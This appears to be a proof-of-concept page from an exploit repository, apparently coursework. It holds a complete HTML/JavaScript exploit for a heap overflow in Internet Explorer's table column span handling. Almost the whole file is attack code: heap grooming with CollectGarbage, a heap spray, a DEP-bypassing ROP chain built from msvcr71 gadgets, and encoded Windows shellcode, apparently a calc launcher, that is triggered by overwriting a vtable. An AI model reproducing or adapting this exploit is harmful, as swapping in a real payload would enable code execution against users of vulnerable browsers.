4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / index.html HTML
<html>
<head></head>
<body>

<div id="evil"></div>

<script>


function exploit(){

	var ex_obj = document.getElementById("7");
	//This number is a magic number.
	//I plan to make address like 07070024.
	//When we exploit.We will find a crash amazing.
	//but we can't control the least bit of ecx.
	//That's why I like this number.Explained in document.
	ex_obj.width = 73769
	//Another magic number.It will affect where we crash.AMAZING!
	ex_obj.span = 19; 
}


function heapspray() {

    // Create a string of 100,000 characters, taking up 200,000 bytes in memory.
    //var str = "\u0024\u0a0a";
    var str = "\u4141\u4141";
    var data = "\u7f98\u7c34"
    //msvcr71 dep bypass rop chain found in a blog..(generated by mona.py)
    var mcrop="\u6c0a\u7c34\ua140\u7c37\u591f\u7c37\u4141\u4141\u6c0a\u7c34\ua140\u7c37\u30ea\u7c35\u6c0b\u7c34\u6069\u7c37\u4141\u4141\u4141\u4141\u4141\u4141\u6402\u7c37\u5c30\u7c34\u6c0a\u7c34\ufcff\uffff\u1e05\u7c35\u4901\u7c35\uffff\uffff\u5255\u7c34\u2174\u7c35\ud201\u7c34\ub001\u7c38\ub8d7\u7c34\ub8d8\u7c34\u4f87\u7c34\uffc0\uffff\u1eb1\u7c35\u6c0a\u7c34\u9090\u9090\u8c81\u7c37";
    //shellcode we use in homework
    var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");
    for(var i=0;i<6;i++){
    //rop nop(just ret)
        data=data+"\u7f98\u7c34";
    }
    //pop pop ret
    data=data+"\u10c2\u7c34"
    //stack pivot
    data=data+"\u8b05\u7c34"
    //first hit point here
    data=data+"\u0024\u0709"
    //dep bypass rop chain
    data=data+mcrop
    //calc shellcode
    data=data+shellcode
    while (str.length < 100000)
        str = str + str;
    
    str=data+str;
    // Allocate a new 64KB string (32768 UNICODE characters take up 64KB of space,
	// not including the heap header, string length field and null terminator)
    //
    // Note that foo is a global variable, because it's not declared
    // with the var keyword. This will ensure that it will not be
    // garbage collected when the function returns.

    str = str.substr(0, 64*1024/2);
    while (str.length < 16*64*1024/2)
        str = str+str;

    //str=str.substr(0,16*64*1024/2-32/2-4/2-2/2);
    foo=new Array();
    for (var i=0;i<100;i++){
        foo[i]=str.substr(0,16*64*1024/2-32/2-4/2-2/2);
    }    
    
}


function start(){
    // This part is from Michael Thompson.Thanks to him.
	var junk1 = "AAAA"; //unescape("%u0041%u0041");
	var junk2 = "BBBB"; //unescape("%u0042%u0042");
	var junk3 = "CCCC"; //unescape("%u0043%u0043");
	var tag = "POPS"; //unescape("%u4f50%u5350"); 

	while (junk1.length < 1000) junk1 += junk1;
	while (junk2.length < 1000) junk2 += junk2;
	while (junk3.length < 1000) junk3 += junk3;

	var love = tag + junk1;
	var hate = tag + junk3;
	var calm = tag + junk2;

	fr = new Array();
	obj = new Array();
	cl = new Array();
    
    //Now create a div desgined to contain CObjects,but won't show on page.
	var div_container = document.getElementById("evil");
	div_container.style.cssText = "display:none";
	
	//CollectGarbage at first.Very important
    CollectGarbage();
    //Create Array for heapspray.SPAN object size:0x1c*8=0*E0
    //CObject size is 0*E0
    //String size (0xE0-6)/2=0x6d
	for(var i = 0; i < 500; i++ ) {

		obj[i] = document.createElement("object");//
		div_container.appendChild(obj[i]);
		fr[i] = love.substring(0,0x6d);
		cl[i] = calm.substring(0,0x6d);
	}
	
	//Now empty the string to prepare holes
	for(i = 400; i < 500; i++){	
		fr[i] = null;
	}
	CollectGarbage();
	//create holes.
}

//start prepare work
start();
//now we try to create a SPAN object and make it fit in a hole.
</script>

<table style="table-layout:fixed" >
 <col id="7" width="41" span="8" >AAAAA</col> 
</table>

<script>
//heapspray sencond time.Prepare rop and shellcode
setTimeout(function(){heapspray()},400);
//trigger the heap overflow.It writeover address in vftable of CObjects.
setTimeout(function(){exploit()},700);//the time need to be modified ,wait the heapspray

</script>

</body>
</html>